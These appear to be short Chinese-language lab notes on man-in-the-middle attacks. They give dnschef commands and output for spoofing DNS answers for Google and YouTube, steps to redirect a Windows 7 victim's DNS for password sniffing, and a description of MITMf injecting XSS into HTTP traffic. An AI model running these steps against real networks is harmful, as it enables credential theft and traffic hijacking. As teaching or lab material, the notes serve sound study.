密码嗅探 DNS欺骗代理 - dnschef --fakeip=1.1.1.10 -- fakedomains=www.google.com,www.youtube.com --interface 1.1.1.2 -q 将被害者DNS指向伪造的DNS服务器 |
root@k:~# dnschef --fakeip=192.168.1.1 --fakedomains=www.google.com,www.youtube.com --interface 192.168.1.110 -q
[+] DNSChef started on interface: 192.168.1.110
[+] Using the following nameservers: 8.8.8.8
[+] Cooking A replies to point to 192.168.1.1 matching: www.google.com
[+] Cooking A replies to point to 192.168.1.1 matching: www.youtube.com,www,goole.com
root@k:~# netstat -pantu | grep :53
udp 0 0 192.168.1.110:53 0.0.0.0:* 2073/python
把win7的DNS地址改为: 192.168.1.110
wireshark Network Analyzer
host 192.168.1.111
中间人攻击 注入XSS - 即使没有XSS漏洞,也可以凌空向每个HTTP请求中注入XSS攻击代码 - 一旦得手,影响范围巨大 - 如果中间人发生在运营商线路上,很难引起用户注意 Mitmf |